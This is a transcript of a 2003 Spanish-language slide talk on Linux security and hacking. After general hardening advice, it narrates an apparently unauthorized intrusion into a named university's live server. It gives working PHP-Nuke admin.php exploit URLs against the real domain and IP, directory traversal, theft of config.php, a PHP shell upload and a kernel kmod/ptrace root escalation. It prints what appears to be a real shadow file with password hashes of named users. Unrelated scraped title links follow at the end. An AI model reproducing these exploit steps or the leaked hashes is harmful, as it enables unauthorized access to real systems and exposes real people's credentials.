Presentacion re y_des_09072003

SEGURIDAD Y HACKINGEN LINUX

Alonso Eduardo Caballero Quezada - ReYDeS -RareGaZz Security Team http://www.RareGaZz.orgSecurity Wari Projetcs http://www.SWP-zone.org

informatizate http://www.informatizate.net

Miércoles 9 de Julio del 2003

SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I

1. Seguridad

2. Seguridad en GNU/Linux

3. Hacking en Linux. (U.N.T)

1. Seguridad en GNU/Linux

Seguridad:

Seguridad es la característica de unsistema informático, que indica queese sistema está libre de todopeligro.

“La seguridad es un estado mental”

Que proteger?

. SoftWare

. HardWare

. Datos

De quien nos protegemos?

- Personas:

. Personal de la empresa . Ex-empleados . Curiosos . Hackers . Crackers . Terroristas (*) . Intrusos Remunerados

- Desastres Naturales:

- Amenazas Logicas:

. Software incorrecto . Herramientas de seguridad . Puertas traseras (Backdoor) . Bombas Logicas . Canales cubiertos . Virus . Gusanos . Caballos de Troya

SEGURIDAD EN LINUX

1. Definición de los servicios necesarios.

. Servidor Web (Apache) . Servidor de Correo (Sendmail) . Servidor SSH, FTP, DNS etc.

2. Utilizar Herramientas de Bastionado. (BASTILLE ó TITAN)

. Educa al administrador sobre potenciales problemas de seguridad en el sistema.

3. Utilizar un Antivirus basado en Software Libre. (AmaViS)

. Indicado cuando hay interacción entre Linux u otro sistema Operativo.

4. Utilización de un PROXY (SQUID).

. Un punto de acceso entre una intranet y una internet.

. Control de los datos. (squidGuard)

5. Instalación y configuración de un Firewall. (IPTABLES).

. Un punto estratégico de vigilancia del sistema.

. Creación de reglas para las conecciones y servicios.

6. Detección de Instrusos basados en HOST. (Tripwire)

. Comprobar la integridad de los archivos en el sistema.

7. Sistema Detector de Intrusos (IDS)

. Vigilancia del Servidor. . Detección de actividad sospechosa. . Respuesta mediata e inmediata

. Uso de (ACID) Consola de D.I

8. Administrador . Persona adecuada.

. Experiencia. (*)

. Actualización constante.

HACKING EN LINUX

ADVERTENCIA:

El artículo completo y detallado de lo expuesto a continuación sera publicado en la eZine RareGaZz Número 20. http://www.RareGaZz.org

Todo esta información se expone solo con finesdidacticos y de conocimiento. De ninguna manera el autor o el Grupo RareGaZz induce a realizar este tipo de acciones.

ReYDeS / RareGaZz Security Team

Institución:

Universidad Nacional de Trujillo

http://www.unitru.edu.pe

Tiempo Total:

2 horas.

Objetivo:

Auditoria Personal y Libre de la Seguridad del servidor de la Universidad Nacional de Trujillo

Primer Punto:

Obtener todo la informacion posible delsistema.

- Tools

. NMAP (www.insecure.org/nmap) . NIKTO (http://www.cirt.net/code/nikto.shtml) . NetCat . Comandos propios de Linux, desde un simple ping a un dig por ejemplo.

- Software De Auditoria:

. NESSUS (http://www.nessus.org)

Nessus

Sistemas Vulnerables: PHPNuke 5.2 y anteriores

Sistemas Inmunes: PHPNuke 5.0 RC1

Exploit: Probando el formato de la siguiente URL:http://www.example.net/admin.php?upload=1 &file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php &userfile_name=hacked.txt

Mediante la anterior peticion de la anterior URL se podríaobserver leer en “config.php”. El cual contiene las claves de laBase de Datos. Con todas las posibles consecuencias que elloacarrea.

PHP NUKE EXPLOIT

Lo anterior, permite automatizar el test sobre la falla en “admin.php”

La URL que se analiza es la siguiente:

http://www.unitru.edu.pe/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

Con esto se copia “hacked.txt” al directorio “images”. Pero nos lleva al menu administracióncon el siguiente error:

Warning: Unable to create '/www/htdocs/images/hacked.txt’: Permission denied in /www/htdocs/admin.php on line 400

Ahora la siguiente URL, nos permite listar cualquier directorio de la web. En éste caso “/images/admin/”

http://www.unitru.edu.pe/admin.php?upload=1&wdir=/images/admin/

Solo directorios de la WEB?... NO!

http://200.60.44.6/admin.php?upload=1&wdir=/../../../

La Raiz del sistema (Formato texto)

bin bin 4k 22-03-2001 18:56:22 boot boot 1k 23-03-2001 07:20:08 etc etc 4k 12-03-2003 09:04:18 root root 4k 22-02-2003 10:25:13 ...

Se puede listar cualquier directorio y verarchivos, pero solo con permisos de nobody.

Que se necesita para elevar privilegios?.

. Acceso de escritura a un directorio.

. Copiar el config.php. Archivo de la configuración del phpnuke.

. Obtener mas información del sistema. Pero ahora desde dentro, por ejemplo Software instalado, versiones, actualizaciones, conecciones, etc.

. Problema: Tenemos el directorio /tmp/ para escritura, pero no podemos visualizar el archivo. Ya que estamos trabajando vía web.

. Solución: Encontramos el programa YaBB http://aries.unitru.edu.pe/foro/install.php

. Se tiene derechos de escritura en /foro/ y podemos visualizarlo vía web. Con lo cual:

http://200.60.44.6/admin.php?upload=1&file=config.php&file_name=p.txt&wdir=/foro/&userfile=config.php&userfile_name=p.txt

[DIR] Parent Directory 24-Feb-2003 23:47 - [ ] install.php 18-Feb-2003 03:08 18k [TXT] p.txt 18-Mar-2003 01:11 11k [ ] yse150.ya 18-Feb-2003 03:09 1.8M

PHP Nuke xploit: Permite subir archivos alsistema.

Con la ayuda de PHP-Nuke exploit para subirarchivos y el PHP Shell para ejecutar comandosya se tiene un mejor control sobte el sistema.

. En /foro/:

. Subir cmd.html, rs.php Y en nuestro localhost utilizamos el phpnuker.html.

Problema: Obtener privilegios ROOT.

Solución: Ejecutar un exploit para “explotar” una falla en el sistema. Por ejemplo. Versión del Kernel?

uname -a Linux aries 2.4.2 #2 Fri Mar 23 06:53:47 PET 2001 i686 unknown

Linux kmod/ptrace bug:

Cuando un proceso hace una petición a unacaracteristica que esta en un modulo. En kernelcrea un proceso hijo setea los permisos EUID GUID a 0 y llama a la funcion execve (“/sbin/mdprobe”)

El problema es que antes de que el EUID cambie el proceso hijo puede ser añadido con ptrace. De ésta manera el usuario puede insertar codigo dentro del proceso lo cual se ejecutará con privilegios de superusuario (ROOT).

Ejemplo: ->

root:$1$1j/xKdpw$KMm/nMEBb3tZkpj42oiL9/:11913:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::gdm:*:9797:0:::::nobody:*:9797:0:::::dwong:$1$3NZyPSF2$2VO7nReTKGN5Y9PftBX1j/:12122:0:99999:7:::mysql:$1$2DIuivNW$5/35UzOTWcOdaPvqRFcuX.:11404:0:99999:7:::webmaster:$1$qcRvrUzR$U9Y5LepV0STQewAdD6FkA/:11624:0:99999:7:::toor:$1$12/Juu6R$riwwt6ZQcX4fKyynY3eZq1:11438:0:99999:7:::jchong:$1$DE/x6fuY$OWWC0qFyQMm7d9XdbG5f1/:11871:0:99999:7:::kayluss:$1$dWpxKneU$plRq15DL8/qtO9Z8414yW0:11914:0:99999:7:::eponte:$1$0hXuyKVe$Qxbdcg/erYBLpPkHNodC0.:12107:0:99999:7:::

Gracias por su atención

[root@camaratru root]# shutdown -r now

e-mail: ReYDeS@bigfoot.com

Agradecimientos:

Mi Madre, mi hermana, mi sobrino y Padre.Angel Protector, alt3kx, Buanzo, PaTa, ocsic, Shadown,enan0, v1k1ng0, MaGics, Yo_soy, runl3v3l, xDAWN, Rebel, Neoy2k, RareTrip, GuyBrush, y0ni, y a todos los que alguna vez participaron en RareGaZz Security Team.A sicario, incompatible, xyz4a3, Sudmaster, y a todo los amigos de Security Wari Projects.A todos mis amigos virtuales del “Underground”.A Miguel, David, Deus, Francisco, Victor, Robert y Juan Manuel, del grupo informatizate.A Arturo, Alejandro, Javier, Juan, miembros de ICIAT.A todos mis amigos “reales”.A Juditsa, Claudia, Paola, Betsy, Cecilia, Carol, Miluska, Marilyn, Patricia, Silvana, Sara, Angela, Leily, Maribel, Cynthia, Elizabeth, Milagros, Erika, Jhenice, Nathaly, etc, etc. En especial a mi: Futura Esposa. (Donde quiera que este)

Problemas de identidad

* Me he olvidado el pasword.... * Me he olvidado mi login.... * ( variante de la anterior ) Es que no sé quien soy.... * Es que soy tonto, y necesito que me lo hagan.... * ¿Cuál es mi "dolarjome"?

Aspirantes a hacker

* ¿Qué tengo que hacer para entrar de root? * ¿Cómo puedo saltarme el firewall? * Oye, no me deja cambiar la configuración de las X... * Es que quiero poner un sniffer, y necesito entrar de root... * Qué hay que hacer en el firewall para que funcione la VozIP?

Presentacion re y_des_09072003

Technology

Transcript of Presentacion re y_des_09072003

Re Ingenieria

Presentacion tecnologia re

Presentacion pau c re-ces 2015.cefev3 (2)

RA RA RA RA RA RA - Català Inicial + Alfabetització · - Autor il·lustracions: Xevi Felip Procedència: Guia per als Cercles de Conversa Llicència: RE RE RE RE RE RE RE Tots els

Re-leer la escuela para re-escribirla (I)

Re-inventando la biblioteca, re-creando la ciudad

Hacia una Re-Construcción Crítica Towards a Critical Re ...

CORRECCIONES TIPOLÓGICAS · tructuras y los edificios existentes, nos plantearemos cuestiones como re-programar, re-densificar, re-escalar, re-vivir, etc. En definitiva se trata

ATP Y STENTING EN RE-ESTENOSIS RENAL POR DISPLASIA FIBROMUSCULAR PRESENTACION DE CASO

Re presentaciones Visuales y Re acciones en Antropología ...rchav.cl/imagenes3/imprimir/jure.pdf · Re‐presentaciones Visuales y Re‐acciones en Antropología. (O sobre cómo

Re Constructions

Re Nacimientoggg

Ensayo RE-cuperar las RE-laciones

Re Nacimiento

Car o Alcalde Re idor 1 Re idor2 Regidor 3 Re idor4 Regidor 5 Postulante ... alcaldia@munijorgebasadre.gob.pe Página 1 de 3 . Cargo Alcalde Regidor 1 Re idor2 Re idor3 Regidor 4 ...

Re Aprender para Re Emprender

Re-conozcamos la Realidad y Re-pensemos la Economía

Presentacion Re Evolucion Voces Y Ecos 2012 Breve

Re Pensando

RE-Habilitación / RE-Uso.